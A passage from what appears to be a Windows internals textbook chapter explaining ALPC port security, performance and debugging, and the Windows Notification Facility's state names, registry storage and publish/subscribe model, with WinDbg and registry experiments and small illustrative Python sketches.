necting to by relying on more than just the port name. With a secured port, the client process submits
to the kernel the SID of the server process it expects on the side of the endpoint. At connection time,
the kernel validates that the client is indeed connecting to the expected server, mitigating namespace
squatting attacks where an untrusted server creates a port to spoof a server.
ALPC also allows both clients and servers to atomically and uniquely identify the thread and process
responsible for each message. It also supports the full Windows impersonation model through the
NtAlpcImpersonateClientThread API. Other APIs give an ALPC server the ability to query the SIDs asso-
ciated with all connected clients and to query the LUID (locally unique identifier) of the client’s security
token (which is further described in Chapter 7 of Part 1).
ALPC port ownership
The concept of port ownership is important to ALPC because it provides a variety of security guaran-
tees to interested clients and servers. First and foremost, only the owner of an ALPC connection port
can accept connections on the port. This ensures that if a port handle were to be somehow duplicated
or inherited into another process, it would not be able to illegitimately accept incoming connections.
Additionally, when handle attributes are used (direct or indirect), they are always duplicated in the con-
text of the port owner process, regardless of who may be currently parsing the message.
These checks are highly relevant when a kernel component might be communicating with a client
using ALPC—the kernel component may currently be attached to a completely different process (or
even be operating as part of the System process with a system thread consuming the ALPC port mes-
sages), and knowledge of the port owner means ALPC does not incorrectly rely on the current process.
Conversely, however, it may be beneficial for a kernel component to arbitrarily accept incoming
connections on a port regardless of the current process. One poignant example of this issue is when an
executive callback object is used for message delivery. In this scenario, because the callback is synchro-
nously called in the context of one or more sender processes, whereas the kernel connection port was
likely created while executing in the System context (such as in DriverEntry), there would be a mismatch
between the current process and the port owner process during the acceptance of the connection.
ALPC provides a special port attribute flag—which only kernel callers can use—that marks a connec-
tion port as a system port; in such a case, the port owner checks are ignored.
Another important use case of port ownership is when performing server SID validation checks if
a client has requested it, as was described in the “Security” section. This validation is always done by
checking against the token of the owner of the connection port, regardless of who may be listening for
messages on the port at this time.
Performance
ALPC uses several strategies to enhance performance, primarily through its support of completion lists,
which were briefly described earlier. At the kernel level, a completion list is essentially a user Memory
Descriptor List (MDL) that’s been probed and locked and then mapped to an address. (For more informa-
tion on MDLs, see Chapter 5 in Part 1.) Because it’s associated with an MDL (which tracks physical pages),
when a client sends a message to a server, the payload copy can happen directly at the physical level
instead of requiring the kernel to double-buffer the message, as is common in other IPC mechanisms.
The completion list itself is implemented as a 64-bit queue of completed entries, and both user-
mode and kernel-mode consumers can use an interlocked compare-exchange operation to insert and
remove entries from the queue. Furthermore, to simplify allocations, once an MDL has been initialized,
a bitmap is used to identify available areas of memory that can be used to hold new messages that are
still being queued. The bitmap algorithm also uses native lock instructions on the processor to provide
atomic allocation and deallocation of areas of physical memory that can be used by completion lists.
Completion lists can be set up with NtAlpcSetInformationPort.
A final optimization worth mentioning is that instead of copying data as soon as it is sent, the kernel
sets up the payload for a delayed copy, capturing only the needed information, but without any copy-
ing. The message data is copied only when the receiver requests the message. Obviously, if shared
memory is being used, there’s no advantage to this method, but in asynchronous, kernel-buffer mes-
sage passing, this can be used to optimize cancellations and high-traffic scenarios.
Power management
As we’ve seen previously, when used in constrained power environments, such as mobile platforms,
Windows uses a number of techniques to better manage power consumption and processor availability, such as by doing heterogeneous processing on architectures that support it (such as ARM64’s big.
LITTLE) and by implementing Connected Standby as a way to further reduce power on user systems
when under light use.
To play nice with these mechanisms, ALPC implements two additional features: the ability for ALPC
clients to push wake references onto their ALPC server’s wake channel and the introduction of the Work
On Behalf Of Attribute. The latter is an attribute that a sender can choose to associate with a message
when it wants to associate the request with the current work ticket that it is associated with, or to create
a new work ticket that describes the sending thread.
Such work tickets are used, for example, when the sender is currently part of a Job Object (either
due to being in a Silo/Windows Container or by being part of a heterogeneous scheduling system and/
or Connected Standby system) and their association with a thread will cause various parts of the system
to attribute CPU cycles, I/O request packets, disk/network bandwidth attribution, and energy estima-
tion to be associated to the “behalf of” thread and not the acting thread.
Additionally, foreground priority donation and other scheduling steps are taken to avoid big.LITTLE
priority inversion issues, where an RPC thread is stuck on the small core simply by virtue of being a
background service. With a work ticket, the thread is forcibly scheduled on the big core and receives a
foreground boost as a donation.
Finally, wake references are used to avoid deadlock situations when the system enters a connected
standby (also called Modern Standby) state, as was described in Chapter 6 of Part 1, or when a UWP
application is targeted for suspension. These references allow the lifetime of the process owning the
ALPC port to be pinned, preventing the force suspend/deep freeze operations that the Process Lifetime
Manager (PLM) would attempt (or the Power Manager, even for Win32 applications). Once the mes-
sage has been delivered and processed, the wake reference can be dropped, allowing the process to
be suspended if needed. (Recall that termination is not a problem because sending a message to a
terminated process/closed port immediately wakes up the sender with a special PORT_CLOSED reply,
instead of blocking on a response that will never come.)
ALPC direct event attribute
Recall that ALPC provides two mechanisms for clients and servers to communicate: requests, which are
bidirectional, requiring a response, and datagrams, which are unidirectional and can never be synchro-
nously replied to. A middle ground would be beneficial—a datagram-type message that cannot be
replied to but whose receipt could be acknowledged in such a way that the sending party would know
that the message was acted upon, without the complexity of having to implement response process-
ing. In fact, this is what the direct event attribute provides.
By allowing a sender to associate a handle to a kernel event object (through CreateEvent) with the
ALPC message, the direct event attribute captures the underlying KEVENT and adds a reference to it,
tacking it onto the KALPC_MESSAGE structure. Then, when the receiving process gets the message,
it can expose this direct event attribute and cause it to be signaled. A client could either have a Wait
Completion Packet associated with an I/O completion port, or it could be in a synchronous wait call
such as with WaitForSingleObject on the event handle and would now receive a notification and/or wait
satisfaction, informing it of the message’s successful delivery.
This functionality was previously manually provided by the RPC runtime, which allows clients call-
ing RpcAsyncInitializeHandle to pass in RpcNotificationTypeEvent and associate a HANDLE to an event
object with an asynchronous RPC message. Instead of forcing the RPC runtime on the other side to
respond to a request message, such that the RPC runtime on the sender’s side would then signal the
event locally to signal completion, ALPC now captures it into a Direct Event attribute, and the message
is placed on a Direct Message Queue instead of the regular Message Queue. The ALPC subsystem will
signal the message upon delivery, efficiently in kernel mode, avoiding an extra hop and context-switch.
Debugging and tracing
On checked builds of the kernel, ALPC messages can be logged. All ALPC attributes, blobs, message
zones, and dispatch transactions can be individually logged, and undocumented !alpc commands
in WinDbg can dump the logs. On retail systems, IT administrators and troubleshooters can enable
the ALPC events of the NT kernel logger to monitor ALPC messages. (Event Tracing for Windows, also known as ETW, is discussed in Chapter 10.) ETW events do not include payload data, but they do contain connection, disconnection, and send/receive and wait/unblock information. Finally, even on retail
systems, certain !alpc commands obtain information on ALPC ports and messages.
EXPERIMENT: Dumping a connection port
In this experiment, you use the CSRSS API port for Windows processes running in Session 1, which
is the typical interactive session for the console user. Whenever a Windows application launches,
it connects to CSRSS’s API port in the appropriate session.
1. Start by obtaining a pointer to the connection port with the !object command:
lkd> !object \Sessions\1\Windows\ApiPort
Object: ffff898f172b2df0 Type: (ffff898f032f9da0) ALPC Port
ObjectHeader: ffff898f172b2dc0 (new version)
HandleCount: 1 PointerCount: 7898
Directory Object: ffffc704b10d9ce0 Name: ApiPort
2. Dump information on the port object itself with !alpc /p. This will confirm, for example,
that CSRSS is the owner:

lkd> !alpc /P ffff898f172b2df0
Port ffff898f172b2df0
Type                    : ALPC_CONNECTION_PORT
CommunicationInfo       : ffffc704adf5d410
ConnectionPort          : ffff898f172b2df0 (ApiPort), Connections
ClientCommunicationPort : 0000000000000000
ServerCommunicationPort : 0000000000000000
OwnerProcess            : ffff898f17481140 (csrss.exe), Connections
SequenceNo              : 0x0023BE45 (2342469)
CompletionPort          : 0000000000000000
CompletionList          : 0000000000000000
ConnectionPending       : No
ConnectionRefused       : No
Disconnected            : No
Closed                  : No
FlushOnClose            : Yes
ReturnExtendedInfo      : No
Waitable                : No
Security                : Static
Wow64CompletionList     : No
5 thread(s) are waiting on the port:
THREAD ffff898f3353b080 Cid 0288.2538 Teb: 00000090bce88000
Win32Thread: ffff898f340cde60 WAIT
THREAD ffff898f313aa080 Cid 0288.19ac Teb: 00000090bcf0e000
Win32Thread: ffff898f35584e40 WAIT
THREAD ffff898f191c3080 Cid 0288.060c Teb: 00000090bcff1000
Win32Thread: ffff898f17c5f570 WAIT
THREAD ffff898f174130c0 Cid 0288.0298 Teb: 00000090bcfd7000
Win32Thread: ffff898f173f6ef0 WAIT
THREAD ffff898f1b5e2080 Cid 0288.0590 Teb: 00000090bcfe9000
Win32Thread: ffff898f173f82a0 WAIT
Main queue is empty.
Direct message queue is empty.
Large message queue is empty.
Pending queue is empty.
Canceled queue is empty.
3. You can see what clients are connected to the port, which includes all Windows processes
running in the session, with the undocumented !alpc /lpc command, or, with a newer
version of WinDbg, you can simply click the Connections link next to the ApiPort name.
You will also see the server and client communication ports associated with each
connection and any pending messages on any of the queues:
lkd> !alpc /lpc ffff898f082cbdf0
ffff898f082cbdf0('ApiPort') 0, 131 connections
ffff898f0b971940 0 ->ffff898F0868a680 0 ffff898f17479080('wininit.exe')
ffff898f1741fdd0 0 ->ffff898f1742add0 0 ffff898f174ec240('services.exe')
ffff898f1740cdd0 0 ->ffff898f17417dd0 0 ffff898f174da200('lsass.exe')
ffff898f08272900 0 ->ffff898f08272dc0 0 ffff898f1753b400('svchost.exe')
ffff898f08a702d0 0 ->ffff898f084d5980 0 ffff898f1753e3c0('svchost.exe')
ffff898f081a3dc0 0 ->ffff898f08a70070 0 ffff898f175402c0('fontdrvhost.ex')
ffff898F086dcde0 0 ->ffff898f17502de0 0 ffff898f17588440('svchost.exe')
ffff898f1757abe0 0 ->ffff898f1757b980 0 ffff898f17c1a400('svchost.exe')
4. Note that if you have other sessions, you can repeat this experiment on those sessions
also (as well as with session 0, the system session). You will eventually get a list of all the
Windows processes on your machine.
Windows Notification Facility
The Windows Notification Facility, or WNF, is the core underpinning of a modern registrationless pub-
lisher/subscriber mechanism that was added in Windows 8 as a response to a number of architectural
deficiencies when it came to notifying interested parties about the existence of some action, event, or
state, and supplying a data payload associated with this state change.
To illustrate this, consider the following scenario: Service A wants to notify potential clients B, C, and
D that the disk has been scanned and is safe for write access, as well as the number of bad sectors (if
any) that were detected during the scan. There is no guarantee that B, C, D start after A—in fact, there’s
a good chance they might start earlier. In this case, it is unsafe for them to continue their execution, and
they should wait for A to execute and report the disk is safe for write access. But if A isn’t even running
yet, how does one wait for it in the first place?
CHAPTER 8 System mechanisms
225
A typical solution would be for B to create an event “CAN_I_WAIT_FOR_A_YET” and then have A look
for this event once started, create the “A_SAYS_DISK_IS_SAFE” event and then signal “CAN_I_WAIT_
FOR_A_YET,” allowing B to know it’s now safe to wait for “A_SAYS_DISK_IS_SAFE”. In a single client sce-
nario, this is feasible, but things become even more complex once we think about C and D, which might
all be going through this same logic and could race the creation of the “CAN_I_WAIT_FOR_A_YET” event,
at which point they would open the existing event (in our example, created by B) and wait on it to be
signaled. Although this can be done, what guarantees that this event is truly created by B? Issues around
malicious “squatting” of the name and denial of service attacks around the name now arise. Ultimately, a
safe protocol can be designed, but this requires a lot of complexity for the developer(s) of A, B, C, and D—
and we haven’t even discussed how to get the number of bad sectors.
WNF features
The scenario described in the preceding section is a common one in operating system design—and the correct pattern for solving it clearly shouldn’t be left to individual developers. Part of the job of an operating system is to provide simple, scalable, and performant solutions to common architectural challenges such as these, and this is what WNF aims to provide on modern Windows platforms, by providing:
- The ability to define a state name that can be subscribed to, or published to, by arbitrary processes, secured by a standard Windows security descriptor (with a DACL and SACL)
- The ability to associate such a state name with a payload of up to 4 KB, which can be retrieved along with the subscription to a change in the state (and published with the change)
- The ability to have well-known state names that are provisioned with the operating system and do not need to be created by a publisher while potentially racing with consumers—thus consumers will block on the state change notification even if a publisher hasn’t started yet
- The ability to persist state data even between reboots, such that consumers may be able to see previously published data, even if they were not yet running
- The ability to assign state change timestamps to each state name, such that consumers can know, even across reboots, if new data was published at some point without the consumer being active (and whether to bother acting on previously published data)
- The ability to assign scope to a given state name, such that multiple instances of the same state name can exist either within an interactive session ID, a server silo (container), a given user token/SID, or even within an individual process
- Finally, the ability to do all of the publishing and consuming of WNF state names while crossing the kernel/user boundary, such that components can interact with each other on either side.
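The capabilities above can be sketched as a small model. The following is a hypothetical Python sketch, not the actual WNF API: a state name holds a payload of up to 4 KB, a monotonic change stamp, and a list of subscriber callbacks; publishing bumps the stamp and signals subscribers, and a consumer that subscribes late still observes the last published state.

```python
class WnfStateName:
    """Toy model of a WNF state name (illustrative only, not the real API)."""
    MAX_PAYLOAD = 4096  # WNF payloads are capped at 4 KB

    def __init__(self):
        self.data = b""
        self.change_stamp = 0          # monotonic publish counter
        self.subscribers = []

    def publish(self, data=b""):
        if len(data) > self.MAX_PAYLOAD:
            raise ValueError("payload exceeds 4 KB")
        self.data = data               # a 0-byte publish still "lights up" the state
        self.change_stamp += 1
        for callback in self.subscribers:
            callback(self.change_stamp, self.data)

    def subscribe(self, callback):
        self.subscribers.append(callback)
        if self.change_stamp:          # late subscriber still sees the last data
            callback(self.change_stamp, self.data)

# A consumer can subscribe before or after the publisher runs:
disk_safe = WnfStateName()
seen = []
disk_safe.subscribe(lambda stamp, data: seen.append((stamp, data)))
disk_safe.publish(b"\x00\x00\x00\x00")   # e.g., zero bad sectors
```

In this model the disk-scan scenario above needs no handshake events: B, C, and D simply subscribe to the state name, and whether A has already published or publishes later, each of them receives the payload and the stamp.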
WNF users
As the reader can tell, providing all these semantics allows for a rich set of services and kernel compo-
nents to leverage WNF to provide notifications and other state change signals to hundreds of clients
(which could be as fine-grained as individual APIs in various system libraries to large scale processes). In
fact, several key system components and infrastructure now use WNF, such as
- The Power Manager and various related components use WNF to signal actions such as closing and opening the lid, battery charging state, turning the monitor off and on, user presence detection, and more.
- The Shell and its components use WNF to track application launches, user activity, lock screen behavior, taskbar behavior, Cortana usage, and Start menu behavior.
- The System Events Broker (SEB) is an entire infrastructure that is leveraged by UWP applications and brokers to receive notifications about system events such as the audio input and output.
- The Process Manager uses per-process temporary WNF state names to implement the wake channel that is used by the Process Lifetime Manager (PLM) to implement part of the mechanism that allows certain events to force-wake processes that are marked for suspension (deep freeze).
Enumerating all users of WNF would take up this entire book because more than 6000 different
well-known state names are used, in addition to the various temporary names that are created (such as
the per-process wake channels). However, a later experiment showcases the use of the wnfdump utility, part of this book’s tools, which allows the reader to enumerate and interact with all of their system’s WNF
events and their data. The Windows Debugging Tools also provide a !wnf extension that is shown in a
future experiment and can also be used for this purpose. Meanwhile, Table 8-31 explains some of
the key WNF state name prefixes and their uses. You will encounter many Windows components and
codenames across a vast variety of Windows SKUs, from Windows Phone to XBOX, exposing the rich-
ness of the WNF mechanism and its pervasiveness.
TABLE 8-31 WNF state name prefixes

Prefix    # of Names  Usage
9P        2           Plan 9 Redirector
A2A       1           App-to-App
AAD       2           Azure Active Directory
AA        3           Assigned Access
ACC       1           Accessibility
ACHK      1           Boot Disk Integrity Check (Autochk)
ACT       1           Activity
AFD       1           Ancillary Function Driver (Winsock)
AI        9           Application Install
AOW       1           Android-on-Windows (Deprecated)
ATP       1           Microsoft Defender ATP
AUDC      15          Audio Capture
AVA       1           Voice Activation
AVLC      3           Volume Limit Change
BCST      1           App Broadcast Service
BI        16          Broker Infrastructure
BLTH      14          Bluetooth
BMP       2           Background Media Player
BOOT      3           Boot Loader
BRI       1           Brightness
BSC       1           Browser Configuration (Legacy IE, Deprecated)
CAM       66          Capability Access Manager
CAPS      1           Central Access Policies
CCTL      1           Call Control Broker
CDP       17          Connected Devices Platform (Project “Rome”/Application Handoff)
CELL      78          Cellular Services
CERT      2           Certificate Cache
CFCL      3           Flight Configuration Client Changes
CI        4           Code Integrity
CLIP      6           Clipboard
CMFC      1           Configuration Management Feature Configuration
CMPT      1           Compatibility
CNET      10          Cellular Networking (Data)
CONT      1           Containers
CSC       1           Client Side Caching
CSHL      1           Composable Shell
CSH       1           Custom Shell Host
CXH       6           Cloud Experience Host
DBA       1           Device Broker Access
DCSP      1           Diagnostic Log CSP
DEP       2           Deployment (Windows Setup)
DEVM      3           Device Management
DICT      1           Dictionary
DISK      1           Disk
DISP      2           Display
DMF       4           Data Migration Framework
DNS       1           DNS
DO        2           Delivery Optimization
DSM       2           Device State Manager
DUMP      2           Crash Dump
DUSM      2           Data Usage Subscription Management
DWM       9           Desktop Window Manager
DXGK      2           DirectX Kernel
DX        24          DirectX
EAP       1           Extensible Authentication Protocol
EDGE      4           Edge Browser
EDP       15          Enterprise Data Protection
EDU       1           Education
EFS       2           Encrypted File Service
EMS       1           Emergency Management Services
ENTR      86          Enterprise Group Policies
EOA       8           Ease of Access
ETW       1           Event Tracing for Windows
EXEC      6           Execution Components (Thermal Monitoring)
FCON      1           Feature Configuration
FDBK      1           Feedback
FLTN      1           Flighting Notifications
FLT       2           Filter Manager
FLYT      1           Flight ID
FOD       1           Features on Demand
FSRL      2           File System Runtime (FsRtl)
FVE       15          Full Volume Encryption
GC        9           Game Core
GIP       1           Graphics
GLOB      3           Globalization
GPOL      2           Group Policy
HAM       1           Host Activity Manager
HAS       1           Host Attestation Service
HOLO      32          Holographic Services
HPM       1           Human Presence Manager
HVL       1           Hypervisor Library (Hvl)
HYPV      2           Hyper-V
IME       4           Input Method Editor
IMSN      7           Immersive Shell Notifications
IMS       1           Entitlements
INPUT     5           Input
IOT       2           Internet of Things
ISM       4           Input State Manager
IUIS      1           Immersive UI Scale
KSR       2           Kernel Soft Reboot
KSV       5           Kernel Streaming
LANG      2           Language Features
LED       1           LED Alert
LFS       12          Location Framework Service
LIC       9           Licensing
LM        7           License Manager
LOC       3           Geolocation
LOGN      8           Logon
MAPS      3           Maps
MBAE      1           MBAE
MM        3           Memory Manager
MON       1           Monitor Devices
MRT       5           Microsoft Resource Manager
MSA       7           Microsoft Account
MSHL      1           Minimal Shell
MUR       2           Media UI Request
MU        1           Unknown
NASV      5           Natural Authentication Service
NCB       1           Network Connection Broker
NDIS      2           Kernel NDIS
NFC       1           Near Field Communication (NFC) Services
NGC       12          Next Generation Crypto
NLA       2           Network Location Awareness
NLM       6           Network Location Manager
NLS       4           Nationalization Language Services
NPSM      1           Now Playing Session Manager
NSI       1           Network Store Interface Service
OLIC      4           OS Licensing
OOBE      4           Out-Of-Box-Experience
OSWN      8           OS Storage
OS        2           Base OS
OVRD      1           Window Override
PAY       1           Payment Broker
PDM       2           Print Device Manager
PFG       2           Pen First Gesture
PHNL      1           Phone Line
PHNP      3           Phone Private
PHN       2           Phone
PMEM      1           Persistent Memory
PNPA-D    13          Plug-and-Play Manager
PO        54          Power Manager
PROV      6           Runtime Provisioning
PS        1           Kernel Process Manager
PTI       1           Push to Install Service
RDR       1           Kernel SMB Redirector
RM        3           Game Mode Resource Manager
RPCF      1           RPC Firewall Manager
RTDS      2           Runtime Trigger Data Store
RTSC      2           Recommended Troubleshooting Client
SBS       1           Secure Boot State
SCH       3           Secure Channel (SChannel)
SCM       1           Service Control Manager
SDO       1           Simple Device Orientation Change
SEB       61          System Events Broker
SFA       1           Secondary Factor Authentication
SHEL      138         Shell
SHR       3           Internet Connection Sharing (ICS)
SIDX      1           Search Indexer
SIO       2           Sign-In Options
SYKD      2           SkyDrive (Microsoft OneDrive)
SMSR      3           SMS Router
SMSS      1           Session Manager
SMS       1           SMS Messages
SPAC      2           Storage Spaces
SPCH      4           Speech
SPI       1           System Parameter Information
SPLT      4           Servicing
SRC       1           System Radio Change
SRP       1           System Replication
SRT       1           System Restore (Windows Recovery Environment)
SRUM      1           Sleep Study
SRV       2           Server Message Block (SMB/CIFS)
STOR      3           Storage
SUPP      1           Support
SYNC      1           Phone Synchronization
SYS       1           System
TB        1           Time Broker
TEAM      4           TeamOS Platform
TEL       5           Microsoft Defender ATP Telemetry
TETH      2           Tethering
THME      1           Themes
TKBN      24          Touch Keyboard Broker
TKBR      3           Token Broker
TMCN      1           Tablet Mode Control Notification
TOPE      1           Touch Event
TPM       9           Trusted Platform Module (TPM)
TZ        6           Time Zone
UBPM      4           User Mode Power Manager
UDA       1           User Data Access
UDM       1           User Device Manager
UMDF      2           User Mode Driver Framework
UMGR      9           User Manager
USB       8           Universal Serial Bus (USB) Stack
USO       16          Update Orchestrator
UTS       2           User Trusted Signals
UUS       1           Unknown
UWF       4           Unified Write Filter
VAN       1           Virtual Area Networks
VPN       1           Virtual Private Networks
VTSV      2           Vault Service
WAAS      2           Windows-as-a-Service
WBIO      1           Windows Biometrics
WCDS      1           Wireless LAN
WCM       6           Windows Connection Manager
WDAG      2           Windows Defender Application Guard
WDSC      1           Windows Defender Security Settings
WEBA      2           Web Authentication
WER       3           Windows Error Reporting
WFAS      1           Windows Firewall Application Service
WFDN      3           WiFi Display Connect (MiraCast)
WFS       5           Windows Family Safety
WHTP      2           Windows HTTP Library
WIFI      15          Windows Wireless Network (WiFi) Stack
WIL       20          Windows Instrumentation Library
WNS       1           Windows Notification Service
WOF       1           Windows Overlay Filter
WOSC      9           Windows One Setting Configuration
WPN       5           Windows Push Notifications
WSC       1           Windows Security Center
WSL       1           Windows Subsystem for Linux
WSQM      1           Windows Software Quality Metrics (SQM)
WUA       6           Windows Update
WWAN      5           Wireless Wide Area Network (WWAN) Service
XBOX      116         XBOX Services
WNF state names and storage
WNF state names are represented as random-looking 64-bit identifiers such as 0xAC41491908517835 and
then mapped to a friendly name using C preprocessor macros such as WNF_AUDC_CAPTURE_ACTIVE. In
reality, however, these numbers are used to encode a version number (1), a lifetime (persistent versus
temporary), a scope (process-instanced, container-instanced, user-instanced, session-instanced, or
machine-instanced), a permanent data flag, and, for well-known state names, a prefix identifying the
owner of the state name followed by a unique sequence number. Figure 8-41 below shows this format.
FIGURE 8-41 Format of a WNF state name: Owner Tag (32 bits), Version (4 bits), Permanent Data flag (1 bit), Data Scope (4 bits), Name Lifetime (2 bits), and Sequence Number (21 bits).
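As an illustration, the layout in Figure 8-41 can be decoded with a few lines of code. Note one assumption not stated in this text: per public WNF research, the published identifiers are additionally XORed with the constant 0x41C64E6DA3BC0074 before use, which is what makes them look random.

```python
# Hypothetical decoder for the Figure 8-41 layout. The XOR key is taken from
# public WNF research and is an assumption here, not part of this text.
WNF_STATE_KEY = 0x41C64E6DA3BC0074

def decode_wnf_state_name(state_name):
    n = state_name ^ WNF_STATE_KEY
    return {
        "version":   n & 0xF,                # 4 bits
        "lifetime":  (n >> 4) & 0x3,         # 2 bits (well-known, permanent, ...)
        "scope":     (n >> 6) & 0xF,         # 4 bits (machine/session/user/process)
        "permanent": (n >> 10) & 0x1,        # 1 bit (permanent data flag)
        "sequence":  (n >> 11) & 0x1FFFFF,   # 21 bits (unique sequence number)
        "owner_tag": (n >> 32) & 0xFFFFFFFF, # 32 bits (ASCII prefix, e.g. "SBS")
    }

# WNF_SBS_UPDATE_AVAILABLE, the value examined in the registry experiment
# later in this section:
fields = decode_wnf_state_name(0x41950C3EA3BC0875)
owner = fields["owner_tag"].to_bytes(4, "little").rstrip(b"\x00").decode()
```

Decoding this identifier yields the owner tag "SBS" from Table 8-31, which is consistent with the friendly name of the state.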
As mentioned earlier, state names can be well-known, which means that they are preprovisioned
for arbitrary out-of-order use. WNF achieves this by using the registry as a backing store, which will
encode the security descriptor, maximum data size, and type ID (if any) under the HKLM\SYSTEM\
CurrentControlSet\Control\Notifications registry key. For each state name, the information is stored
under a value matching the 64-bit encoded WNF state name identifier.
Additionally, WNF state names can also be registered as persistent, meaning that they will remain
registered for the duration of the system’s uptime, regardless of the registrar’s process lifetime. This
mimics permanent objects that were shown in the “Object Manager” section of this chapter, and
similarly, the SeCreatePermanentPrivilege privilege is required to register such state names. These
WNF state names also live in the registry, but under the HKLM\SOFTWARE\Microsoft\Windows NT\
CurrentVersion\VolatileNotifications key, and take advantage of the registry’s volatile flag to simply
disappear once the machine is rebooted. You might be confused to see “volatile” registry keys being
used for “persistent” WNF data—keep in mind that, as we just indicated, the persistence here is within
a boot session (versus attached to process lifetime, which is what WNF calls temporary, and which
we’ll see later).
Furthermore, a WNF state name can be registered as permanent, which endows it with the abil-
ity to persist even across reboots. This is the type of “persistence” you may have been expecting
earlier. This is done by using yet another registry key, this time without the volatile flag set, pres-
ent at HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Notifications. Suffice it to say, the
SeCreatePermanentPrivilege is needed for this level of persistence as well. For these types of WNF
states, there is an additional registry key found below the hierarchy, called Data, which contains, for
each 64-bit encoded WNF state name identifier, the last change stamp, and the binary data. Note that
if the WNF state name was never written to on your machine, the latter information might be missing.
Experiment: View WNF state names and data in the registry
In this experiment, you use the Registry Editor to take a look at the well-known WNF names as
well as some examples of permanent and persistent names. By looking at the raw binary registry
data, you will be able to see the data and security descriptor information.
1. Open Registry Editor and navigate to the HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Notifications key.
2. Take a look at the values you see, which should look like the screenshot below.
3. Double-click the value called 41950C3EA3BC0875 (WNF_SBS_UPDATE_AVAILABLE), which opens the raw registry data binary editor.
4. Note how in the following figure, you can see the security descriptor (the highlighted binary data, which includes the SID S-1-5-18), as well as the maximum data size (0 bytes).
Be careful not to change any of the values you see because this could make your system inop-
erable or open it up to attack.
Finally, if you want to see some examples of permanent WNF state, use the Registry Editor to go
to the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Notifications\
Data key, and look at the value 418B1D29A3BC0C75 (WNF_DSM_DSMAPPINSTALLED). An example
is shown in the following figure, in which you can see the last application that was installed on this
system (MicrosoftWindows.UndockedDevKit).
Finally, a completely arbitrary state name can be registered as a temporary name. Such names have
a few distinctions from what was shown so far. First, because their names are not known in advance,
they do require the consumers and producers to have some way of passing the identifier between
each other. Normally, whoever either attempts to consume the state data first or to produce state data
instead ends up internally creating and/or using the matching registry key to store the data. However,
with temporary WNF state names, this isn’t possible because the name is based on a monotonically
increasing sequence number.
Second, and related to this fact, no registry keys are used to encode temporary state names—they
are tied to the process that registered a given instance of a state name, and all the data is stored in
kernel pool only. These types of names, for example, are used to implement the per-process wake
channels described earlier. Other uses include power manager notifications, and direct service triggers
used by the SCM.
WNF publishing and subscription model
When publishers leverage WNF, they do so by following a standard pattern of registering the state
name (in the case of non-well-known state names) and publishing some data that they want to expose.
They can also choose not to publish any data but simply provide a 0-byte buffer, which serves as a way
to “light up” the state and signals the subscribers anyway, even though no data was stored.
Consumers, on the other hand, use WNF’s registration capabilities to associate a callback with a
given WNF state name. Whenever a change is published, this callback is activated, and, for kernel
mode, the caller is expected to call the appropriate WNF API to retrieve the data associated with the
state name. (The buffer size is provided, allowing the caller to allocate some pool, if needed, or perhaps
choose to use the stack.) For user mode, on the other hand, the underlying WNF notification mecha-
nism inside of Ntdll.dll takes care of allocating a heap-backed buffer and providing a pointer to this
data directly to the callback registered by the subscriber.
In both cases, the callback also provides the change stamp, which acts as a unique monotonic se-
quence number that can be used to detect missed published data (if a subscriber was inactive, for some
reason, and the publisher continued to produce changes). Additionally, a custom context can be associ-
ated with the callback, which is useful in C++ situations to tie the static function pointer to its class.
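The change stamp makes missed-data detection a one-line check. A minimal sketch (hypothetical helper, not a WNF API) of what a subscriber might do with the stamp delivered to its callback:

```python
def detect_missed_publishes(last_seen_stamp, new_stamp):
    """Return how many publishes occurred that this consumer never observed.

    Change stamps are monotonic, so a gap larger than 1 between the stamp we
    last processed and the stamp just delivered means intermediate publishes
    were missed (for example, while the subscriber was inactive).
    """
    return max(0, new_stamp - last_seen_stamp - 1)
```

A subscriber that persists its last processed stamp can run this check on every callback (or at startup, against the current stamp) and decide whether to resynchronize its state.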
Note WNF provides an API for querying whether a given WNF state name has been reg-
istered yet (allowing a consumer to implement special logic if it detects the producer must
not yet be active), as well as an API for querying whether there are any subscriptions cur-
rently active for a given state name (allowing a publisher to implement special logic such as
perhaps delaying additional data publication, which would override the previous state data).
WNF manages what might be thousands of subscriptions by associating a data structure with each
kernel and/or user-mode subscription and tying all the subscriptions for a given WNF state name
together. This way, when a state name is published to, the list of subscriptions is parsed, and, for user
mode, a delivery payload is added to a linked list followed by the signaling of a per-process notification
event—this instructs the WNF delivery code in Ntdll.dll to call the API to consume the payload (and any
other additional delivery payloads that were added to the list in the meantime). For kernel mode, the
mechanism is simpler—the callback is synchronously executed in the context of the publisher.
Note that it’s also possible to subscribe to notifications in two modes: data-notification mode, and
meta-notification mode. The former does what one might expect—executing the callback when new
data has been associated with a WNF state name. The latter is more interesting because it sends noti-
fications when a new consumer has become active or inactive, as well as when a publisher has termi-
nated (in the case of a volatile state name, where such a concept exists).
Finally, it’s worth pointing out that user-mode subscriptions have an additional wrinkle: Because
Ntdll.dll manages the WNF notifications for the entire process, it’s possible for multiple components
(such as dynamic libraries/DLLs) to have requested their own callback for the same WNF state name
(but for different reasons and with different contexts). In this situation, the Ntdll.dll library needs to
associate registration contexts with each module, so that the per-process delivery payload can be
translated into the appropriate callback and only delivered if the requested delivery mode matches the
notification type of the subscriber.
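This per-module bookkeeping amounts to a small dispatch table. The sketch below is a hypothetical model of the idea (the names are invented; it is not the Ntdll.dll implementation): each registration records its module, requested delivery mode, and callback, and a delivery only fires the callbacks whose mode matches the notification type.

```python
# state_name -> list of (module, delivery_mode, callback) registrations
registrations = {}

def register(state_name, module, delivery_mode, callback):
    """Record a per-module subscription for a WNF state name."""
    registrations.setdefault(state_name, []).append(
        (module, delivery_mode, callback))

def deliver(state_name, notification_type, payload):
    """Fan one per-process delivery payload out to matching registrations."""
    delivered = 0
    for module, mode, callback in registrations.get(state_name, []):
        if mode == notification_type:   # only fire if the requested mode matches
            callback(payload)
            delivered += 1
    return delivered
```

Two DLLs can thus subscribe to the same state name for different reasons (one for data notifications, one for meta notifications) without stepping on each other.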
Experiment: Using the WnfDump utility to dump WNF state names
In this experiment, you use one of the book tools (WnfDump) to register a WNF subscription to
the WNF_SHEL_DESKTOP_APPLICATION_STARTED state name and the WNF_AUDC_RENDER
state name.
1. Execute wnfdump on the command line with the following flags:
   -i WNF_SHEL_DESKTOP_APPLICATION_STARTED -v
The tool displays information about the state name and reads its data, such as shown in the
following output:
C:\>wnfdump.exe -i WNF_SHEL_DESKTOP_APPLICATION_STARTED -v
WNF State Name | S | L | P | AC | N | CurSize | MaxSize
